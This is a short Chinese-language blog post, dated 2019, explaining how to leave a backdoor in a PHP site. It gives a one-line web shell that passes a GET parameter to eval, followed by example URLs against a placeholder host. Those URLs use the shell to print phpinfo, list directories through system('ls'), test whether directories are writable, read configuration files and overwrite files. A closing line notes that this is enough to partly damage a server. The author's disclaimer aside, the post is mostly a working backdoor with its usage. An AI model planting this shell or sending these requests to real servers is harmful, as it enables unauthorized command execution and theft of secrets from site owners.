共享屋素材-经验分享-分享PHP留后门的一些用法,也就是大家常说的木马病毒

分享PHP留后门的一些用法,也就是大家常说的木马病毒

日期:2019年08月07日

标签: PHP 后门 木马 病毒

来源:共享屋素材官网

阅读:595
关于分享说明
ABOUT SHARING INSTRUCTIONS

我为什么要写这篇文章?我写这篇文章的出发点不是教会大家去写什么木马病毒之类的程序,而是分享一下我自己的一个想法,希望这次只是一次简单的学习分享,程序猿都要有自己的底线和初衷。否则就浪费了我写这文章的初心了。

什么是后门?
WHAT IS A BACK DOOR?

今天我就来说一些最常见的PHP留后门的一些用法和注意的地方,也就是大家经常说的木马病毒,哈哈,不要作坏事哦!



实现代码步骤
CODE IMPLEMENTATION STEPS


1、<?php eval($_GET['evl']);

就这样,你已经得这台服务器上得很多执行权限了,这是一个比较简单得一种形式。那么使用得场景又有哪些呢?


A:打印服务器:phpinfo

http://www.ceshi.com/a.php?evl=phpinfo()


B:查看某个目录下有什么文件之类的

http://www.ceshi.com/a.php?evl=var_dump(system("ls /mnt/web/ -a"));


C:查看目录是否可写,接下来就可以在可写的目录里创建可执行的文件了

http://www.ceshi.com/a.php?evl=var_dump(is_writable("/mnt/web/abc/"));


D:获取某个文件的内容,一般的情况是涌来读取配置文件的,具体的看自己需求

http://www.ceshi.com/a.php?evl=var_dump(file_get_contents("/mnt/web/temp/api.php"));


E:对某个可写目录进行写如文件操作

http://www.ceshi.com/a.php?evl=var_dump(file_put_contents("/mnt/web/temp/api.php",file_get_contents("/mnt/web/script/test.php")));


好咯,以上基本已经可以完成对一个服务器的查看的部分破坏了,如果你想要其它的功能就根据这几条举一反三操作就可以了。这是一些关注PHP后门的简单留门场景,也是一些常用的隐藏方法,时就先写这几个场景把!

相关推荐